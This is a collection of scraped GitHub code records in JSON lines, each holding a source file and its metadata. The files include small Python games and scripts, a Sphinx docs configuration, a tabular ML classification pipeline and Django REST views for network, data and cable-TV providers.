{"seq_id":"2900929601","text":"from random import randint\n\naleatorio = randint(0, 10)  # generates a (pseudo) random number between 0 and 10\n\n# numero = int(input('Enter a number between 0 and 10: '))\n# contador = 1\n\n# while numero != aleatorio:\n#     # print('You win!!')\n#     contador += 1\n#     numero = int(input('Enter a number between 0 and 10: '))\n# else:\n#     print('You got it!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')\n\n# if contador == 1:\n#     print(f'Guessed it after {contador} attempt')\n# else:\n#     print(f'Guessed it after {contador} attempts')\n\nacertou = False\npalpite = 0\n\nwhile not acertou:\n    palpite += 1\n    jogador = int(input('Enter your guess between 0 and 10: '))\n    if jogador == aleatorio:\n        acertou = True\n    else:\n        if jogador < aleatorio:\n            print('Higher...')\n        elif jogador > aleatorio:\n            print('Lower...')\n\nif palpite == 1:\n    print(f'Guessed it after {palpite} attempt')\nelse:\n    print(f'Guessed it after {palpite} attempts')\n\nprint('Yay!!')\n","repo_name":"cecilia-martins/trybe-exercicios","sub_path":"ciencia-da-computacao/curso em video/ex058.py","file_name":"ex058.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"73037026087","text":"import argparse\n\nfrom resspect.fit_lightcurves import fit_snpcc\nfrom resspect.fit_lightcurves import fit_plasticc\n\n__all__ = ['fit_dataset']\n\n\ndef fit_dataset(user_choices):\n    \"\"\"Fit the entire sample with the Bazin function.\n\n    All results are saved to file.\n\n    Parameters\n    ----------\n    -o: str\n        Path to output feature file.\n    -s: str\n        Simulation name. Options are 'SNPCC', 'RESSPECT' or 'PLAsTiCC'.\n    -dd: str (optional)\n        Path to directory containing raw data.\n        Only used for SNPCC simulations.\n    -hd: str (optional)\n        Path to header file. Only used for PLASTICC simulations.\n    -p: str (optional)\n        Path to photometry file. Only used for PLASTICC simulations.\n    -sp: str or None (optional)\n        Sample to be fitted. Options are 'train', 'test' or None.\n        Default is None.\n    -n: int or None (optional)\n        Number of cores to be used. If None all cores are used. \n        Default is 1.\n    -f: str (optional)\n        Function used for feature extraction. Options are \"bazin\" and \"bump\".\n        Default is \"bazin\". 
Only used for SNPCC for now.\n \n Examples\n --------\n\n For SNPCC: \n\n >>> fit_dataset.py -s SNPCC -dd -o \n\n For PLAsTiCC:\n\n >>> fit_dataset.py -s -p \n -hd -o \n \"\"\"\n\n # raw data directory\n data_dir = user_choices.input\n features_file = user_choices.output\n ncores = user_choices.ncores\n\n if user_choices.sim_name in ['SNPCC', 'snpcc']:\n # fit the entire sample\n fit_snpcc(path_to_data_dir=data_dir, features_file=features_file,\n number_of_processors=ncores, feature_extractor=user_choices.function)\n\n elif user_choices.sim_name in ['PLAsTiCC', 'PLASTICC', 'plasticc']:\n fit_plasticc(path_photo_file=user_choices.photo_file,\n path_header_file=user_choices.header_file,\n output_file=features_file,\n sample=user_choices.sample,\n number_of_processors=ncores)\n\n return None\n\n\ndef main():\n\n # get input directory and output file name from user\n parser = argparse.ArgumentParser(description='resspect - Fit Light curves module')\n \n parser.add_argument('-dd', '--datadir', dest='input',\n help='Path to directory holding raw data. Only used for SNPCC',\n required=False, default=' ')\n parser.add_argument('-hd', '--header', dest='header_file', \n help='Path to header file. Only used for PLASTICC.',\n required=False, default=' ')\n parser.add_argument('-o', '--output', dest='output', help='Path to output file.', \n required=True)\n parser.add_argument('-p', '--photo', dest='photo_file',\n help='Path to photometry file. Only used for PLASTICC.',\n required=False, default=' ')\n parser.add_argument('-s', '--simulation', dest='sim_name', \n help='Name of simulation (data set). ' + \\\n 'Options are \"SNPCC\" or \"PLAsTiCC\".',\n required=True)\n parser.add_argument('-sp', '--sample', dest='sample',\n help='Sample to be fitted. Options are \"train\", ' + \\\n ' \"test\" or None.',\n required=False, default=None)\n parser.add_argument('-n', '--number-of-processors', dest='ncores', \n help='Number of processors. 
Default is 1.',\n                        required=False, default=1, type=int)\n    parser.add_argument('-f', '--function', dest='function', \n                        help='Function used for feature extraction.',\n                        required=False, default=\"bazin\")\n\n    user_input = parser.parse_args()\n\n    fit_dataset(user_input)\n\n\nif __name__ == '__main__':\n    main()","repo_name":"COINtoolbox/RESSPECT","sub_path":"resspect/scripts/fit_dataset.py","file_name":"fit_dataset.py","file_ext":"py","file_size_in_byte":3969,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
{"seq_id":"134428753","text":"import numpy as np\nfrom collections import deque\n\nclass UTILCalculation:\n    def __init__ (self, relations):\n        self.RELATIONS = deque(relations)\n    \n    def projection(self, cube):\n        return np.max(cube, axis=0)\n\n    def join(self, r1,r2):\n        return r1[:,:, None] + r2[:, None, :]\n\n\n    def hypercube(self, R):\n        proj = None\n        if len(R) < 2:\n            return np.asarray(R)\n\n        try:\n            # get first relation\n            r1 = R.pop()\n            # get second relation\n            r2 = R.pop()\n\n            proj = self.projection(self.join(r1,r2))\n\n            R.append(proj)\n            # recurse with the merged relation; the original misspelled this as hyperCube\n            proj = self.hypercube(R)\n        except IndexError as index:\n            print(index)\n\n        return np.asarray(proj)","repo_name":"vassilispapadop/dcop","sub_path":"util_calculation.py","file_name":"util_calculation.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"15657888827","text":"import os\nimport subprocess\nimport re\n\nmonths = {\"jan\": \"01\",\n          \"feb\": \"02\",\n          \"mar\": \"03\",\n          \"apr\": \"04\",\n          \"may\": \"05\",\n          \"jun\": \"06\",\n          \"jul\": \"07\",\n          \"aug\": \"08\",\n          \"sep\": \"09\",\n          \"oct\": \"10\",\n          \"nov\": \"11\",\n          \"dec\": \"12\",\n          }\n\n\ndef rename(oldname):\n    for mon in months.keys():\n        parts = oldname.split(mon)\n        if len(parts) > 1:\n            break\n    else:\n        raise ValueError(\"Doesn't match expected format\")\n\n    day = parts[0]\n    if len(day) < 2:\n        day = \"0\" + day\n\n    year = parts[1].split(\".\")[0]\n\n    return \"meeting\" + year + months[mon] + day + \".md\"\n\n\ndef rename2(oldname):\n    date = re.findall(\"[0-9]{6,6}\", oldname)[0]\n    return \"20\" + date[:2] + \"-\" + date[2:4] + \"-\" + date[4:] + \".md\"\n\n\nfor old_nm in os.listdir():\n    try:\n        nm = rename2(old_nm)\n        print(nm)\n        subprocess.run((\"git\", \"mv\", old_nm, nm))\n    except IndexError:\n        continue  # a bare next was a no-op; skip files without a six-digit date\n","repo_name":"clarkfitzg/phd_research","sub_path":"meetings/namer.py","file_name":"namer.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"}
{"seq_id":"43651642722","text":"\"\"\"Tester.py\r\n\"\"\"\r\nimport sys\r\nsys.path.append(\"C:\\\\temp\\\\blendertest\")\r\nfrom os import path\r\nfrom random import randint\r\nimport math\r\n\r\nfrom blend2data import *\r\nfrom svg import *\r\n\r\nSVG_DIR = \"c:\\\\temp\"\r\n\r\nif __name__ == \"__main__\":\r\n    mesh = bpy.context.selected_objects[0].data\r\n    svg_paths = []\r\n    rotations = []\r\n    sizes = []\r\n    names = []\r\n    translations = []\r\n    for index, face in enumerate(mesh.polygons):\r\n        rotation = get_rotation(face.normal)\r\n        flat_face = flatten_face(face, mesh)\r\n        trans = get_3d_location(flat_face)*100\r\n        translations.append(trans)\r\n        verts = relocate_face(flat_face)\r\n        polygon = Polygon([vert * 100 for vert in verts])\r\n        print(verts)\r\n        sizes.append(polygon.get_size())\r\n        svg = create_svg([polygon])\r\n        name = path.join(SVG_DIR, \"face_{0}.svg\".format(index))\r\n        open(name, 
\"wb\").write(svg.encode(\"ascii\"))\r\n svg_paths.append(name)\r\n rotations.append(rotation)\r\n names.append(\"face_{0}.svg\".format(index))\r\n \r\n open(path.join(SVG_DIR, \"index.html\"), \"wb\").write(\"\"\"\r\n \r\n {0}\r\n \r\n \r\n \"\"\".format(\"\\n\".join(\r\n \"
\".format(\r\n math.degrees(r[0]),\r\n math.degrees(r[2]), \r\n p,\r\n s[0], \r\n s[1],\r\n (\"#{0:02x}{1:02x}{2:02x}\".format(randint(0, 256)%0xff,randint(0, 256)%0xff,randint(0, 256)%0xff)),\r\n \"{0:0.3f}px,{1:0.3f}px,{2:0.3f}px\".format(t.x,t.y,t.z)\r\n ) for\r\n r,p,s,t in zip(rotations,names, sizes,translations))).encode(\"ascii\"))","repo_name":"tmr232/blend2html","sub_path":"tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3964033700","text":"'''\nFinal Project - CSC 101 0502[66785] (Borough of Manhattan CC)\n\nStudent Name - Ahmed Soliman\n'''\n\ndef remove_new_line_char_from_list (lst):\n i= 0\n while i element on each page for social media\n \"sphinxext.opengraph\",\n # enable writing in markdown rather than reStructuredText\n \"myst_parser\",\n # add copy button to code blocks\n \"sphinx_copybutton\",\n # enable autogenerating API reference sections\n \"sphinx.ext.autodoc\", # core library rst->html\n \"sphinx.ext.autosummary\", # library for recursive generation of rst\n # enables parsing of docstrings using .. automodule, .. autoclass,\n # and .. autofunction directives\n \"sphinx.ext.autodoc\",\n # enables :ref: directives to link to subheadings in the same/different documents\n # see https://sublime-and-sphinx-guide.readthedocs.io/en/latest/references.html#links-to-sections-in-the-same-document\n \"sphinx.ext.autosectionlabel\",\n # in docstrings, references to modules/classes/functions become hyperlinks\n # to those sphinx documentation pages; in this way, we can connect documentation\n # for our dependencies to *our* documentation--as long as the other project\n # has a hosted Sphinx page somewhere\n \"sphinx.ext.intersphinx\",\n \"sphinx.ext.todo\",\n \"sphinx.ext.viewcode\",\n \"sphinx.ext.coverage\",\n \"sphinx.ext.doctest\",\n \"sphinx.ext.ifconfig\",\n \"sphinx.ext.mathjax\",\n # \"sphinx.ext.imgmath\", # requires latex CLI\n \"sphinx.ext.napoleon\",\n # enable generating images from .drawio diagram files\n \"sphinxcontrib.drawio\",\n]\n\n# fontawesome icons\n# html_css_files = [\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css\"]\n\n# paths relative to _static/\nhtml_css_files = [\n \"css/external-links.css\",\n \"css/admonition-fonts.css\",\n \"css/remove-formatting.css\",\n]\nhtml_js_files = [\n \"js/remove-readthedocs-versions.js\",\n]\n\n\ndef is_mac_os():\n \"\"\"Return ``True`` if this script is being run on MacOS.\"\"\"\n system = platform.system().lower()\n\n # is_windows = system == \"windows\"\n # is_linux = system == \"linux\"\n is_mac = system == \"darwin\"\n\n return is_mac\n\n\n# drawio_binary_path = \"/usr/local/bin/drawio\"\ndrawio_binary_path = \"/Applications/draw.io.app/Contents/MacOS/draw.io\" if is_mac_os() else \"/opt/drawio/drawio\"\ndrawio_no_sandbox = not is_mac_os()\ndrawio_headless = \"auto\"\n\nautosummary_generate = True # Turn on sphinx.ext.autosummary\n\n# suppressable warnings here: https://www.sphinx-doc.org/en/master/usage/configuration.html#confval-suppress_warnings\nsuppress_warnings = [\n # suppress \"duplicate label\" warnings; these prevented us from having\n # headers anywhere in the sphinx document with the same name\n \"autosectionlabel.*\"\n]\n\n\n# open graph extension config\nogp_site_url = \"https://docs.rootski.io/\"\nogp_image = \"https://www.rootski.io/rootski-io-preview-image.jpg\" # preview image\n\n# Add any paths that contain templates here, relative to 
this directory.\ntemplates_path = [\"_templates\"]\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\n# This pattern also affects html_static_path and html_extra_path.\nexclude_patterns = []\n\n\n# -- Options for HTML output -------------------------------------------------\n\nhtml_favicon = \"favicon.ico\"\nhtml_logo = \"logo.svg\"\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\n#\nhtml_theme = \"furo\"\nhtml_title = \"Knowledge Base\"\nlanguage = \"en\"\n\nhtml_css_files += [\n \"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/fontawesome.min.css\",\n \"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/solid.min.css\",\n \"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/brands.min.css\",\n]\n\nhtml_theme_options: Dict[str, Any] = {\n # \"announcement\": \"Important announcement!\",\n \"sidebar_hide_name\": True,\n \"footer_icons\": [\n {\n \"name\": \"GitHub\",\n \"url\": \"https://github.com/rootski-io/rootski\",\n \"html\": \"\",\n \"class\": \"fab fa-github fa-2x\",\n },\n {\n \"name\": \"LinkedIn\",\n \"url\": \"https://www.linkedin.com/company/rootski/\",\n \"html\": \"\",\n \"class\": \"fab fa-linkedin fa-2x\",\n },\n {\n \"name\": \"YouTube Playlist\",\n \"url\": \"https://www.youtube.com/playlist?list=PLwF2z4Iu4rabmY7RbRNetjZprLfe8qWNz\",\n \"html\": \"\",\n \"class\": \"fab fa-youtube fa-2x\",\n },\n {\n \"name\": \"Slack\",\n \"url\": \"https://join.slack.com/t/rootskiio/shared_invite/zt-13avx8j84-mocJVx5wFAGNf5wUuy07OA\",\n \"html\": \"\",\n \"class\": \"fab fa-slack fa-2x\",\n },\n ]\n}\n\n# configure the \"pencil\" (edit in GitHub) button; we must pretend that\n# we use READTHEDOCS to do this, because the Furo theme only officially\n# supports ReadTheDocs+GitHub for this feature as of March 2022.\nhtml_context = {}\nhtml_context[\"READTHEDOCS\"] = True\nhtml_context[\"current_version\"] = \"latest\"\nhtml_context[\"conf_py_path\"] = \"/docs/source/\"\nhtml_context[\"display_github\"] = True\nhtml_context[\"github_user\"] = \"rootski-io\"\nhtml_context[\"github_repo\"] = \"rootski\"\nhtml_context[\"github_version\"] = \"trunk\"\nhtml_context[\"slug\"] = \"rski\"\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. 
They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = [\"_static\"]\n\n\n# -- External mapping --------------------------------------------------------\npython_version = \".\".join(map(str, sys.version_info[0:2]))\n# intersphinx_mapping = {\n# \"sphinx\": (\"http://www.sphinx-doc.org/en/stable\", None),\n# \"python\": (\"https://docs.python.org/\" + python_version, None),\n# \"matplotlib\": (\"https://matplotlib.org\", None),\n# \"numpy\": (\"https://docs.scipy.org/doc/numpy\", None),\n# \"sklearn\": (\"https://scikit-learn.org/stable\", None),\n# \"pandas\": (\"https://pandas.pydata.org/pandas-docs/stable\", None),\n# \"scipy\": (\"https://docs.scipy.org/doc/scipy/reference\", None),\n# \"sqlalchemy\": (\"https://docs.sqlalchemy.org/en/stable/\", None),\n# \"aws_cdk\": (\"https://docs.aws.amazon.com/cdk/api/latest/python/\", None),\n# }\n","repo_name":"rootski-io/rootski","sub_path":"docs/source/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":7812,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"53"} +{"seq_id":"18455394672","text":"from datetime import date, datetime, timedelta\n\n\nclass TimeEntry:\n\n def __init__(\n self,\n time_date: date,\n time_type: str,\n start: datetime,\n end: datetime,\n duration: timedelta,\n comment: str\n ):\n self.time_date = time_date\n self.time_type = time_type\n self.start = start\n self.end = end\n self.duration = duration\n self.comment = comment\n","repo_name":"ChrisOe/timetracking_txt_convert","sub_path":"timetracking_txt_convert/timeentry.py","file_name":"timeentry.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18246645230","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import StandardScaler, LabelEncoder\nfrom sklearn.model_selection import train_test_split, cross_val_score\nfrom sklearn.model_selection import RepeatedStratifiedKFold, GridSearchCV\nfrom sklearn.metrics import roc_curve, roc_auc_score\n\nfrom lightgbm import LGBMClassifier\nfrom xgboost import XGBClassifier\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nfrom sklearn.ensemble import HistGradientBoostingClassifier\nfrom sklearn.dummy import DummyClassifier \n\n\nTRAIN_PATH = 'data/task1_train_v4.csv'\nTEST_PATH = 'data/task1_test_v4.csv'\nPREDICTIONS_FOLDER = 'answer/'\nSCORING = 'matthews_corrcoef' #'roc_auc'\nCV_FOLDS = 5\nCATEGORICAL_FEATURES = ['stat_2']\nLGBM_PARAM_GRID = {'num_leaves': [31, 63, 127],\n 'learning_rate': [0.05, 0.1, 0.2],\n 'n_estimators': [150, 175, 200],\n 'min_child_samples': [10, 20, 30],\n 'reg_alpha': [0, 1, 10],\n 'reg_lambda': [0, 1, 10],\n 'verbose':[-1]}\nXGB_PARAM_GRID = {'learning_rate': [0.05, 0.1, 0.2],\n 'max_depth': [3, 5, 7],\n 'n_estimators': [50, 100, 200],\n 'subsample': [0.5, 0.7, 1.0],\n 'colsample_bytree': [0.5, 0.7, 1.0],\n 'gamma': [0, 0.1, 0.2],}\nLGBM_BEST_PARAMS = {'learning_rate': 0.05,\n 'min_child_samples': 30,\n 'n_estimators': 150,\n 'num_leaves': 127,\n 'reg_alpha': 1,\n 'reg_lambda': 0,\n 'verbose':-1,\n 'objective': 'binary'}\nXGB_BEST_PARAMS = {'colsample_bytree': 0.7,\n 
'gamma': 0,\n                   'learning_rate': 0.05,\n                   'max_depth': 7,\n                   'n_estimators': 200,\n                   'subsample': 0.7}\nCLASSIFIERS_NAN_TOLERANT = [LGBMClassifier(**LGBM_BEST_PARAMS),\n                            XGBClassifier(**XGB_BEST_PARAMS),\n                            HistGradientBoostingClassifier(),\n                            DecisionTreeClassifier(),\n                            DummyClassifier(strategy=\"most_frequent\"),]\nCLASSIFIERS_NAN_INTOLERANT = [\n                            RandomForestClassifier(),\n                            GradientBoostingClassifier(),\n                            KNeighborsClassifier(),\n                            GaussianNB(),\n                            LogisticRegression(),]\nBEST_CLASSIFIER = LGBMClassifier(**LGBM_BEST_PARAMS)\n\n\ndef explore_data(data:pd.DataFrame) -> None:\n    \"\"\" Run exploratory data analysis \"\"\"\n    print(f\"Data shape:\\n{data.shape}\")\n    print(f\"\\nData types:\\n{data.dtypes}\")\n    print(f\"\\nDescriptive statistics:\\n{data.describe()}\")\n    print(f\"\\nFirst rows:\\n{data.head()}\")\n    print(f\"\\nNumber of unique values:\\n{data.nunique()}\")\n    print(f\"\\nNumber of missing values:\\n{data.isnull().sum()}\")\n    print(f\"\\nClass distribution:\\n{data['y'].value_counts()}\\n\")\n\n\ndef replace_missing_with_avg(df:pd.DataFrame) -> pd.DataFrame:\n    \"\"\" Replace missing values with the column means. \"\"\"\n    for col in df.columns:\n        if df[col].dtype != 'object':\n            avg = df[col].mean()\n            df[col].fillna(avg, inplace=True)\n    return df\n\n\ndef replace_missing_with_normal(data:pd.DataFrame) -> pd.DataFrame:\n    \"\"\"\n    Replace missing values with draws from a per-column normal distribution.\n    \"\"\"\n    for col in data.columns:\n        if data[col].dtype != 'object':\n            mean = data[col].mean()\n            std = data[col].std()\n            null_count = data[col].isnull().sum()\n            if null_count > 0:\n                null_idx = data[col].isnull()\n                data.loc[null_idx, col] = np.random.normal(loc=mean,\n                                                           scale=std,\n                                                           size=null_count)\n    return data\n\n\ndef detect_and_remove_outliers(data:pd.DataFrame) -> pd.DataFrame:\n    \"\"\" Detect and remove outliers \"\"\"\n    len_before = data.shape[0] # remember the row count before removal\n    for col in data.columns:\n        if data[col].dtype != 'object':\n            z_scores = np.abs((data[col] - data[col].mean()) / data[col].std())\n            data = data[z_scores <= 3]\n    print(f\"Removed {len_before - data.shape[0]} rows with outliers\")\n    return data\n\n\ndef split_xy(data:pd.DataFrame) -> pd.DataFrame:\n    \"\"\" Split features and target \"\"\"\n    X = data.drop('y', axis=1)\n    y = data['y']\n    return X, y\n\n\ndef encode_categorical_data(X_train:pd.DataFrame,\n                            X_test:pd.DataFrame,\n                            categorical_features:list) -> tuple:\n    \"\"\"\n    Encode categorical features with LabelEncoder from scikit-learn.\n    \"\"\"\n    X_train_encoded = X_train.copy()\n    X_test_encoded = X_test.copy()\n\n    for feature in categorical_features:\n        X_train_encoded = X_train_encoded.astype({feature: str})\n        X_test_encoded = X_test_encoded.astype({feature: str})\n        le = LabelEncoder()\n        le.fit(X_train[feature])\n        X_train_encoded[feature] = le.transform(X_train[feature])\n        X_test_encoded[feature] = le.transform(X_test[feature])\n    \n    return X_train_encoded, X_test_encoded\n\n\ndef scale_data(X_train:pd.DataFrame,\n               X_test:pd.DataFrame,\n               categorical_features:list) -> pd.DataFrame:\n    \"\"\" Scale the features, fitting on train only to avoid \"leakage\" \"\"\"\n    scaler = StandardScaler()\n    numerical_features = X_train.columns.difference(categorical_features)\n    X_train[numerical_features]=scaler.fit_transform(X_train[numerical_features])\n    X_test[numerical_features]=scaler.transform(X_test[numerical_features])\n    return X_train, X_test\n\n\ndef select_boosting_params(X:pd.DataFrame,\n                 
y:pd.Series,\n                           param_grid:dict, classifier) -> dict:\n    \"\"\" Tune parameters with GridSearch and cross-validation \"\"\"\n    grid_search = GridSearchCV(classifier,\n                               param_grid,\n                               cv=CV_FOLDS,\n                               scoring=SCORING,\n                               n_jobs=-1,\n                               verbose=1)\n    grid_search.fit(X, y)\n    print(f\"The best parameters for {classifier.__class__.__name__}:\\\n          \\n{grid_search.best_params_}\\n\")\n    return grid_search.best_params_\n\n\ndef plot_roc_auc(classifiers:list, X:pd.DataFrame, y:pd.Series, title:str)->None:\n    \"\"\" Plot ROC curves for all models \"\"\"\n    plt.figure(figsize=(8, 6))\n    plt.plot([0, 1], [0, 1], 'k--')\n    X_train, X_test, y_train, y_test = train_test_split(X, y, \n                                                        test_size=0.1,\n                                                        random_state=42)\n    for classifier in classifiers:\n        classifier.fit(X_train, y_train)\n        y_pred = classifier.predict_proba(X_test)[:, 1]\n        fpr, tpr, _ = roc_curve(y_test, y_pred)\n        auc_score = roc_auc_score(y_test, y_pred)\n        label = f'{classifier.__class__.__name__} (AUC = {auc_score:.3f})'\n        plt.plot(fpr, tpr, label=label)\n\n    plt.xlabel('False positive rate')\n    plt.ylabel('True positive rate')\n    plt.title(title)\n    plt.legend()\n    plt.savefig(f\"{PREDICTIONS_FOLDER}task1 {title}.png\")\n    plt.show()\n\n\ndef test_classifiers(classifiers:list, X:pd.DataFrame, y:pd.Series,) -> dict:\n    \"\"\" Evaluate model quality with cross-validation \"\"\"\n    scorings = {}\n    for classifier in classifiers:\n        cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=3, random_state=1)\n        n_scores = cross_val_score(classifier, X, y, \n                                   scoring=SCORING, \n                                   cv=cv,\n                                   n_jobs=-1,\n                                   error_score='raise')\n        scorings[classifier.__class__.__name__] = np.mean(n_scores)\n    return scorings\n\n\ndef make_barplot(results:dict, title:str) -> None:\n    \"\"\" Draw a barplot of the classification results \"\"\"\n    df = pd.Series(results).sort_values(ascending=True, inplace=False)\n    plt.figure(figsize=(12, 6))\n    plt.barh(df.index, df.values, align='center', alpha=0.8, left=0.17)\n    plt.title(title)\n    plt.savefig(f\"{PREDICTIONS_FOLDER}task1 {title}.png\")\n    plt.show()\n\n\ndef fit_and_predict(classifier,\n                    X:pd.DataFrame,\n                    y:pd.Series,\n                    X_test:pd.DataFrame) -> None:\n    \"\"\" Fit the model on the train data and make predictions \"\"\"\n    classifier.fit(X, y)\n    y_pred = classifier.predict(X_test)\n    y_pred = pd.DataFrame(y_pred, columns=['y'])\n    predictions_path = f\"{PREDICTIONS_FOLDER}task1_predictions.csv\"\n    y_pred.to_csv(predictions_path, index=False)\n    print(f\"Predictions saved to {predictions_path}\")\n\n\ndef main():\n    # Load the data\n    data = pd.read_csv(TRAIN_PATH, sep=\";\")\n    X_to_predict = pd.read_csv(TEST_PATH, sep=\";\")\n\n    # Run exploratory data analysis\n    explore_data(data)\n    \"\"\"\n    Key findings:\n    - All remaining columns have a numeric data type. \n    - The data is split almost evenly between the classes (1: 7506, 0: 7494)\n    - Every column has more than 17% (2683/15000) missing values.\n    - There is a small number (61) of rows with outliers.\n    - Column means differ strongly, so normalization is needed. \n    - Values in the stat_2 column belong to a small set (46).\n      The values are integers. 
This may indicate that it is a categorical feature.\n    \"\"\"\n\n    # Split features and target\n    X, y = split_xy(data)\n\n    # Encode categorical features\n    X, X_to_predict = encode_categorical_data(X, X_to_predict,\n                                              CATEGORICAL_FEATURES)\n\n    # Scale the features\n    X, X_to_predict = scale_data(X, X_to_predict, CATEGORICAL_FEATURES)\n\n    # # Tune the boosting parameters and store them as constants\n    # lgbm_params = select_boosting_params(X, y, LGBM_PARAM_GRID, LGBMClassifier())\n    # xgb_params = select_boosting_params(X, y, XGB_PARAM_GRID, XGBClassifier())\n\n    # Plot ROC curves for models without NaN replacement\n    plot_roc_auc(CLASSIFIERS_NAN_TOLERANT, X, y,\n                 title=\"ROC AUC without replacing NaN with means\")\n\n    # Evaluate model quality with the f1 metric and cross-validation\n    scorings = test_classifiers(CLASSIFIERS_NAN_TOLERANT, X, y)\n\n    # Draw a barplot of the classification results\n    make_barplot(scorings, f\"{SCORING} score of models without replacing NaN with means\")\n\n    # Preprocess the data\n    # Replace missing values with the column means.\n    data_preprocessed = replace_missing_with_avg(data)\n\n    # Remove outliers\n    data_preprocessed = detect_and_remove_outliers(data_preprocessed)\n\n    # Split features and target \n    X_preprocessed, y_preprocessed = split_xy(data_preprocessed)\n\n    # Plot ROC curves for models with preprocessed data \n    plot_roc_auc(CLASSIFIERS_NAN_INTOLERANT, X_preprocessed, y_preprocessed,\n                 title=\"ROC AUC with NaN replaced by means\")\n\n    # Evaluate model quality with the f1 metric and cross-validation\n    scorings = test_classifiers(CLASSIFIERS_NAN_INTOLERANT, X_preprocessed, y_preprocessed)\n\n    # Draw a barplot of the classification results\n    make_barplot(scorings, f\"{SCORING} score of models with NaN replaced by means\")\n\n    # Predict results for the test data\n    # fit_and_predict(BEST_CLASSIFIER, X, y, X_to_predict)\n\n\nif __name__ == \"__main__\":\n    main()\n\n\n# TODO:\n# Make versions runnable from Java\n# Write the score on the barplots themselves\n# Fix the model names in the barplots\n# Put 9 plots on one figure for task 2\n# Check that folders exist before saving files\n# Write tests\n\n# DOCS:\n# https://biodatamining.biomedcentral.com/articles/10.1186/s13040-023-00322-4","repo_name":"dkleptsov/deeplay","sub_path":"task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":14137,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26712968267","text":"\nfrom django.contrib.auth import get_user_model\n# from .admin_views import CableTvProvidersViewSet\nUser = get_user_model()\nfrom django.shortcuts import get_object_or_404, render\nfrom rest_framework import viewsets, status\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nimport jwt, uuid, json\nfrom django.contrib.auth.hashers import make_password, check_password\nfrom django.db import transaction\nfrom utilities.models import *\n\n \nclass GetNetworkProviderView(APIView):\n    \n    def get(self, request):\n        try:\n            results = NetworkProviders.objects.all().values('public_id','isp_name','api_provider')\n            return Response({\"status\": True, \"message\":\"Network providers successfully retrieved\", \"data\": list(results)}, status=status.HTTP_200_OK)\n        except Exception as e:\n            return Response({\"status\": False, \"data\": str(e)})\n    \n    # @is_admin\n    def post(self,request):\n        data = request.data\n        data['public_id'] = uuid.uuid4()\n        network_provider = 
NetworkProviders.objects.create(**data)\n        if network_provider:\n            response = {\"status\":True,\"message\":f\"Network provider ({network_provider.isp_name}) was created\"}\n            return Response(response,status = status.HTTP_201_CREATED)\n        else:\n            response = {\"status\":False,\"message\":f\"Network provider ({network_provider.isp_name}) was not created\"}\n            return Response(response,status=status.HTTP_200_OK)\n    \nclass GetDataSubscriptionView(APIView):\n    def get(self, request, uid):\n        try:\n            results = DataSubscriptions.objects.all().filter(plan_provider_id=get_object_or_404(NetworkProviders,public_id=uid).id).values('plan_provider_id','plan_name','plan_code','plan_price','duration','api_provider')\n            if results:\n                data_struct = []\n                for plan in range(len(results)):\n                    data_struct.append(results[plan])\n                return Response({\"status\": True, \"message\":\"Data plan for {0} successfully retrieved\".format(uid), \"data\": data_struct}, status=status.HTTP_200_OK)\n            else:\n                return Response({\"status\": False, \"data\":\"Could not retrieve data plans\"})\n            \n        except Exception as e:\n            return Response({\"status\": False, \"data\": str(e)})\n    \nclass GetCableTvProvidersView(APIView):\n    def get(self, request):\n        try:\n            results = CableTvProviders.objects.all().values('id','public_id','cabletv_name','api_provider')\n            if results:\n                return Response({\"status\": True, \"message\":\"Cable Tv providers successfully retrieved\", \"data\": results}, status=status.HTTP_200_OK)\n            else:\n                return Response({\"status\": True, \"message\":\"No results were found!\", \"data\": []}, status=status.HTTP_200_OK)\n        except Exception as e:\n            return Response({\"status\": False, \"data\": str(e)})\n    \n    def post(self,request):\n        data = request.data\n        data['public_id'] = uuid.uuid4()\n        cable_provider = CableTvProviders.objects.create(**data)\n        if cable_provider:\n            response = {\"status\":True,\"message\":f\"Cable provider ({cable_provider.cabletv_name}) was created\"}\n            return Response(response,status = status.HTTP_201_CREATED)\n        else:\n            response = {\"status\":False,\"message\":f\"Cable provider ({cable_provider.cabletv_name}) was not created\"}\n            return Response(response,status=status.HTTP_200_OK)\n    \nclass GetCableTvBouquetsView(APIView):\n    def get(self, request):\n        try:\n            id = request.GET.get('id')\n            results = CableTvBouquets.objects.all().filter(bouquet_provider_id=int(id)).values('bouquet_provider_id','bouquet_name','bouquet_price','bouquet_code','api_provider')\n            if results:\n                return Response({\"status\": True, \"message\":\"Tv 